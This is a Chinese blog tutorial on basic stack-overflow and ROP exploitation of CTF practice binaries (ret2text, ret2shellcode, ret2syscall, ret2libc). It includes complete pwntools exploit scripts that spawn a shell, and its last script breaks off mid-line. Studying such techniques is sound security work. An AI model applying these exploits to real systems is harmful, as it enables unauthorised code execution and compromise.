<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="Chinese">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222"/>
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2"/>

<link rel="stylesheet" href="/css/main.css?v=7.1.0"/>


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/2.png?v=7.1.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/2.png?v=7.1.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="ret2text首先checksec，查看保护  开启了NX保护，IDA查看程序  很明显存在栈溢出漏洞，继续查看程序，发现有一处调用shell  想要程序调用system函数，需要input==secretcode，而secretcode每次都是随机的，所以只能通过栈溢出，让main函数的返回值为调用system函数的地方，查看该函数所在的位置  0x0804863A，接下来是找到函数返回的地址">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="PWN学习之基本ROP">
<meta property="og:url" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/index.html">
<meta property="og:site_name" content="KANGEL">
<meta property="og:description" content="ret2text首先checksec，查看保护  开启了NX保护，IDA查看程序  很明显存在栈溢出漏洞，继续查看程序，发现有一处调用shell  想要程序调用system函数，需要input==secretcode，而secretcode每次都是随机的，所以只能通过栈溢出，让main函数的返回值为调用system函数的地方，查看该函数所在的位置  0x0804863A，接下来是找到函数返回的地址">
<meta property="og:locale" content="Chinese">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/1.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/2.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/3.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/4.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/5.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/6.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/7.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/8.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/9.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/10.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/11.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/12.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/13.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/14.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/15.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/21.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/22.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/23.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/16.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/17.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/18.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/19.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/20.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/24.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/25.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/26.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/27.JPG">
<meta property="og:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/28.JPG">
<meta property="og:updated_time" content="2019-06-10T15:13:40.287Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PWN学习之基本ROP">
<meta name="twitter:description" content="ret2text首先checksec，查看保护  开启了NX保护，IDA查看程序  很明显存在栈溢出漏洞，继续查看程序，发现有一处调用shell  想要程序调用system函数，需要input==secretcode，而secretcode每次都是随机的，所以只能通过栈溢出，让main函数的返回值为调用system函数的地方，查看该函数所在的位置  0x0804863A，接下来是找到函数返回的地址">
<meta name="twitter:image" content="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/1.JPG">



  <link rel="alternate" href="/atom.xml" title="KANGEL" type="application/atom+xml"/>



  
  
  <link rel="canonical" href="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/"/>



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>PWN学习之基本ROP | KANGEL</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="Chinese">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
<a href="https://github.com/J-KANGEL" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">KANGEL</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br/>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br/>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br/>Categories</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br/>Archives</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://j-kangel.github.io/2019/05/18/PWN学习之基本ROP/"/>

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="kangel"/>
      <meta itemprop="description" content="Life is beautiful!"/>
      <meta itemprop="image" content="/images/0.jpg"/>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="KANGEL"/>
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">PWN学习之基本ROP

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-05-17 20:08:43" itemprop="dateCreated datePublished" datetime="2019-05-17T20:08:43Z">2019-05-17</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2019-06-10 15:13:40" itemprop="dateModified" datetime="2019-06-10T15:13:40Z">2019-06-10</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/pwn学习/" itemprop="url" rel="index"><span itemprop="name">pwn学习</span></a></span>

                
                
              
            </span>
          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h3><p>首先checksec，查看保护</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/1.JPG" alt=""></p>
<p>开启了NX保护，IDA查看程序</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/2.JPG" alt=""></p>
<p>很明显存在栈溢出漏洞，继续查看程序，发现有一处调用shell</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/3.JPG" alt=""></p>
<p>想要程序调用system函数，需要input==secretcode，而secretcode每次都是随机的，所以只能通过栈溢出，让main函数的返回值为调用system函数的地方，查看该函数所在的位置</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/4.JPG" alt=""></p>
<p>0x0804863A，接下来是找到函数返回的地址，并将其覆盖</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/5.JPG" alt=""></p>
<p>0xffffd338-0xffffd2cc = 108，于是构造payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./ret2text"</span>)</span><br><span class="line">addr = <span class="number">0x0804863A</span></span><br><span class="line">payload = (<span class="number">108</span>+<span class="number">4</span>) * <span class="string">'a'</span> + p32(addr)</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>例题：jarvisOJ level0</p>
<h3 id="ret2shellcode"><a href="#ret2shellcode" class="headerlink" title="ret2shellcode"></a>ret2shellcode</h3><p>首先checksec</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/6.JPG" alt=""></p>
<p>32位程序，没有开启任何保护，IDA查看程序</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/7.JPG" alt=""></p>
<p>有栈溢出，例外，strncpy()函数将gets的内容写入buf2中。于是攻击思路如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">将shellcode写入buf2中，然后利用栈溢出将函数返回地址覆盖为buf2的地址。例外有一点需要注意的是，shellcode长度不能超过0x64，buf2部分可写可执行</span><br></pre></td></tr></table></figure>
<p>查看buf2的地址</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/8.JPG" alt=""></p>
<p>可以看到buffer位于.bss段的0x0804A080处，接下来查看此处地址的权限</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/9.JPG" alt=""></p>
<p>vmmap查看内存，0xa080+0x64=0xa0c4，有可写可读可执行权限。于是构造payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./ret2shellcode"</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line"><span class="keyword">print</span> shellcraft.sh()</span><br><span class="line"><span class="keyword">print</span> hex(len(shellcode))   <span class="comment">#0x2c</span></span><br><span class="line">buf = <span class="number">0x0804a080</span></span><br><span class="line">payload = shellcode.ljust(<span class="number">112</span>,<span class="string">'a'</span>) + p32(buf)</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>例题：jarvisOJ level1</p>
<h3 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h3><p>首先checksec</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/10.JPG" alt=""></p>
<p>开启NX，IDA查看程序</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/11.JPG" alt=""></p>
<p>没有系统函数和shellcode，但是依然有栈溢出，这时候可以利用系统调用。下面介绍几个相关知识：</p>
<p>执行系统调用的指令是 int 0x80</p>
<p>系统调用获取shell的函数是 execve(“/bin/sh”,NULL,NULL)</p>
<p>对应的寄存器的值（对于32位程序）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">系统调用号，即 eax 应该为 0xb</span><br><span class="line">第一个参数，即 ebx 应该指向 /bin/sh 的地址，其实执行 sh 的地址也可以。</span><br><span class="line">第二个参数，即 ecx 应该为 0</span><br><span class="line">第三个参数，即 edx 应该为 0</span><br></pre></td></tr></table></figure>
<p>给寄存器赋值要利用到pop，因此需要ROPgadget</p>
<p>查找可存储寄存器的代码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop  --only <span class="string">'pop|ret'</span> | grep <span class="string">'eax'</span></span><br></pre></td></tr></table></figure>
<p>查找字符串</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop --string <span class="string">"/bin/sh"</span></span><br></pre></td></tr></table></figure>
<p>查找有int 0x80的地址</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop  --only <span class="string">'int'</span></span><br></pre></td></tr></table></figure>
<p>还有一点需要注意的是:ret操作会执行一次pop并作为跳转地址</p>
<p>首先找eax</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/12.JPG" alt=""></p>
<p>选取如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x080bb196 : pop eax ; ret</span><br></pre></td></tr></table></figure>
<p>再找ebx</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/13.JPG" alt=""></p>
<p>选取如下，一举三得</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br></pre></td></tr></table></figure>
<p>查找”/bin/sh”</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/14.JPG" alt=""></p>
<p>查找int 0x80</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/15.JPG" alt=""></p>
<p>编写脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./rop"</span>)</span><br><span class="line">pop_eax_ret = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx_ret = <span class="number">0x0806eb90</span></span><br><span class="line">int_0x80 = <span class="number">0x08049421</span></span><br><span class="line">binsh = <span class="number">0x80be408</span></span><br><span class="line">payload = flat([<span class="string">'A'</span> * <span class="number">112</span>, pop_eax_ret, <span class="number">0xb</span>, pop_edx_ecx_ebx_ret, <span class="number">0</span>, <span class="number">0</span>, binsh, int_0x80])</span><br><span class="line"><span class="keyword">print</span> len(payload)</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="ret2libc"><a href="#ret2libc" class="headerlink" title="ret2libc"></a>ret2libc</h3><h4 id="ret2libc1"><a href="#ret2libc1" class="headerlink" title="ret2libc1"></a>ret2libc1</h4><p>首先checksec</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/21.JPG" alt=""></p>
<p>32位程序，NX开启。IDA查看程序</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/22.JPG" alt=""></p>
<p>存在栈溢出漏洞，Get shell最直接的方法就是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">改写程序返回地址为so库中system函数的地址，同时布置好栈，将参数“/bin/sh\x00”放在’返回地址往后两个单位内存地址’处即可</span><br></pre></td></tr></table></figure>
<p>查看system函数和”/bin/sh”的地址</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/23.JPG" alt=""></p>
<p>编写脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./ret2libc1"</span>)</span><br><span class="line">system_addr = <span class="number">0x08048460</span></span><br><span class="line">bin_sh = <span class="number">0x08048720</span></span><br><span class="line">payload = flat([<span class="number">112</span>*<span class="string">'a'</span>,system_addr,<span class="string">'aaaa'</span>,bin_sh])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>例题：jarvisOJ level2</p>
<h4 id="ret2libc2"><a href="#ret2libc2" class="headerlink" title="ret2libc2"></a>ret2libc2</h4><p>首先checksec</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/16.JPG" alt=""></p>
<p>32位程序，开启了NX。IDA查看程序</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/17.JPG" alt=""></p>
<p>有栈溢出，并且有system函数和gets函数，攻击思路：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">利用gets函数向.bss段中写入“/bin/sh”，再调用系统函数执行system(&quot;/bin/sh&quot;)</span><br></pre></td></tr></table></figure>
<p>gdb查看system函数和gets函数在plt表中的位置</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/18.JPG" alt=""></p>
<p>找一个buf来存储写入的”/bin/sh”</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/19.JPG" alt=""></p>
<p>再找一个gadget连接gets和buf2，即ebx</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/20.JPG" alt=""></p>
<p>编写脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./ret2libc2"</span>)</span><br><span class="line">get_addr = <span class="number">0x08048460</span></span><br><span class="line">system_addr = <span class="number">0x08048490</span></span><br><span class="line">buf2 = <span class="number">0x0804a080</span></span><br><span class="line">pop_ebx = <span class="number">0x0804843d</span></span><br><span class="line">payload = flat([<span class="number">112</span>*<span class="string">'a'</span>,get_addr,pop_ebx,buf2,system_addr,<span class="string">'aaaa'</span>,buf2])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.sendline(<span class="string">"/bin/sh"</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>该方法同样适用于ret2libc1</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./ret2libc1"</span>)</span><br><span class="line">get_addr = <span class="number">0x08048430</span></span><br><span class="line">system_addr = <span class="number">0x08048460</span></span><br><span class="line">buf2 = <span class="number">0x0804a080</span></span><br><span class="line">pop_ebx = <span class="number">0x0804841d</span></span><br><span class="line">payload = flat([<span class="number">112</span>*<span class="string">'a'</span>,get_addr,pop_ebx,buf2,system_addr,<span class="string">'aaaa'</span>,buf2])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.sendline(<span class="string">"cat flag &gt; 111"</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="ret2libc3"><a href="#ret2libc3" class="headerlink" title="ret2libc3"></a>ret2libc3</h3><p>首先checksec</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/24.JPG" alt=""></p>
<p>32位程序，NX开启。IDA查看</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/25.JPG" alt=""></p>
<p>有栈溢出，无system函数。下面介绍两个知识点：</p>
<p>1、system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的，也就是说要找基地址。举个例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">puts真实地址-puts偏移地址 = system真实地址-system偏移地址 = 基地址</span><br></pre></td></tr></table></figure>
<p>2、那么如何得到 libc 中的某个函数的地址呢？我们一般常用的方法是采用 got 表泄露，即输出某个函数对应的 got 表项的内容。当然，由于 libc 的延迟绑定机制，我们需要泄漏已经执行过的函数的地址，已经执行过的话就会在got表生存下来。同时可以根据got表项找到对应的libc.so，从而确定函数偏移。举个例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">利用puts函数泄露puts函数的got表，因为puts函数在gets之前使用过。</span><br></pre></td></tr></table></figure>
<p>利用puts的got表项找对应的libc.so有两种方法：</p>
<p>1、<a href="https://libc.blukat.me" target="_blank" rel="noopener">https://libc.blukat.me</a></p>
<p>2、<a href="https://github.com/lieanu/LibcSearcher" target="_blank" rel="noopener">https://github.com/lieanu/LibcSearcher</a></p>
<p>objdump看一下got表有哪些</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/26.JPG" alt=""></p>
<p>因为PIE是关闭的，所以可以直接去puts出got表中puts的内容，并且返回到面函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p=process(<span class="string">'./ret2libc3'</span>)</span><br><span class="line"><span class="keyword">if</span> args.G:</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">elf = ELF(<span class="string">"./ret2libc3"</span>)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">112</span> + p32(elf.plt[<span class="string">'puts'</span>]) + p32(elf.symbols[<span class="string">'main'</span>]) + p32(elf.got[<span class="string">'puts'</span>])</span><br><span class="line">p.sendlineafter(<span class="string">'!?'</span>,payload)</span><br><span class="line">puts_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="keyword">print</span> hex(puts_addr)</span><br></pre></td></tr></table></figure>
<p>然后根据got表中puts的内容找到相应的libc</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/27.JPG" alt=""></p>
<p>这样就可以求出libc的基地址，system的地址和“/bin/sh”的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">libc_base = puts_addr - libc.symbols[<span class="string">'puts'</span>]</span><br><span class="line">system_addr = libc_base + libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">binsh_addr = next(libc.search(<span class="string">"/bin/sh"</span>))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">112</span> + p32(system_addr) + p32(elf.symbols[<span class="string">'main'</span>]) + p32(binsh_addr)</span><br><span class="line">p.sendlineafter(<span class="string">'!?'</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>但是这样有个小问题，第二次调用main函数的时候，esp和ebp的相对偏移发生了变化，payload应为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">'a'</span>*<span class="number">112</span> + p32(system_addr) + p32(elf.symbols[<span class="string">'main'</span>]) + p32(binsh_addr)</span><br></pre></td></tr></table></figure>
<p>利用cyclic来判断</p>
<p><img src="/2019/05/18/PWN学习之基本ROP/28.JPG" alt=""></p>
<p>于是编写脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> 